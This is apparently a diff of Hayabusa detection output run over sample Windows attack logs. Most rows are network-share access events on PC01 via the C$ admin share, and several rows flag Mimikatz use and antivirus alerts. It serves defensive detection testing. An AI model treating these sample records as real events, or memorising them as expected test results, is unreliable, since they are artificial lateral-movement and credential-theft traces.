+2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\release\x64\db  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\release\x64\memdumps  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\release\x64\platforms  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\release\x64\plugins  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\winrar-cve  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Documents  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Downloads  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Favorites  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Favorites\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Favorites\Links for United States\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Favorites\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Favorites\Links for United States  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Music  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Pictures  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Saved Games  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Searches  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Videos  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Documents\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Downloads\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Music\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Pictures\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Recorded TV\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Videos\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\mimikatz_trunk  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\mimikatz_trunk\Win32  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\mimikatz_trunk\x64  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Documents  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Downloads  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Music  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Music\Sample Music\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Music\Sample Music  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Pictures  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Pictures\Sample Pictures\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Pictures\Sample Pictures  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Videos  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Videos\Sample Videos\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Videos\Sample Videos  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Recorded TV  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Recorded TV\Sample Media\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Recorded TV\Sample Media  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Desktop\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Documents\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Downloads\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Favorites\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Music\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Pictures\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Videos\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Desktop  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Documents  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Downloads  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Favorites  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Music  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Pictures  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Saved Games  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Videos  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Desktop\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Documents\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Downloads\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Favorites\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Music\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
